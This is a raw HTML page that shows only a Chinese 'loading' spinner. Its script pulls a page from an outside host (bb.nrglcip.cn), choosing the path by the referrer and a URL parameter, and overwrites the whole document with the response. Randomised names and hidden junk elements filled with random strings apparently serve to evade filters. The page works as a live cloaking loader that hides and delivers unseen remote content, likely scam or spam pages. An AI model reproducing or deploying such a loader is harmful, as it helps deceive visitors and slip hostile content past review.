<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .sSt30F5hh {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .sSt30F5hh .BM6vtj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .sSt30F5hh .content {
            line-height: 50px;
            text-align: center
        }

        .sSt30F5hh .img {
            width: 100%
        }

        .sSt30F5hh .Pfvi7GF4gmA {
            text-align: center
        }

        .sSt30F5hh .Pfvi7GF4gmA span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .sSt30F5hh .Pfvi7GF4gmA span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .sSt30F5hh .Pfvi7GF4gmA span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .sSt30F5hh .Pfvi7GF4gmA span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .sSt30F5hh .Pfvi7GF4gmA span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .sSt30F5hh .Pfvi7GF4gmA span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .sSt30F5hh .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function I3DZMUt9xZ3Q(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vj4wT = I3DZMUt9xZ3Q('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vj4wT +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vj4wT +".html?a=share";
		}
		
        ATB5khUUNc=url+"#"+new Date().getTime();
        ATB5khUUNc && function() {
            $.get(ATB5khUUNc, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >QhtpHsZWjS724R09AzSGrEDe73VT2OEjvOGqwa0JsTj7nNsli</ul>
<b style='display:none' >dzuSFn18WbT22i1BD2lPLcmpEWzw3h4yIKbtJE2dyWbfgFtXDkW0UlKIqCC4yt</b>
<span style='display:none'>gOMEXNW4KoqqH9ApsfbYXBqdoSpVk9DoEhHphAKRiH6IENeoDxVqnBbvhoj8TCMBuNRnHgDR</span>
<li style='display:none' >gxOzKIQRDiJyNEGlCU3cjj9C4B4nVWZeZ9oZtg</li><div class="sSt30F5hh">
    <div class="BM6vtj">
        <div class="Pfvi7GF4gmA">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>bQZuVMyIpDpiXFjerxMEqBUOuDSH6V1qsENa95I1a8OfXT2X5BrtIuQ2MM2</p>
<span style='display:none'>ax2tEutpR8XL08LhSxs6NW6erxuRUQEDoIQOH2u0F69raCkIOfLDVTPgznZa1oSo</span>
<img  src='' style='display:none'>
<p  style='display:none'>bQZuVMyIpDpiXFjerxMEqBUOuDSH6V1qsENa95I1a8OfXT2X5BrtIuQ2MM2</p>
<img  src='' style='display:none'>
<span style='display:none'>ax2tEutpR8XL08LhSxs6NW6erxuRUQEDoIQOH2u0F69raCkIOfLDVTPgznZa1oSo</span>
<h1 style='display:none' >Z1Q53KFPo9Hsje92Km5a1eVI7lu</h1>
<b style='display:none' >wiDRdjzRYhp3N0LjUxtRnp7xS2l7Z</b></body>
</html>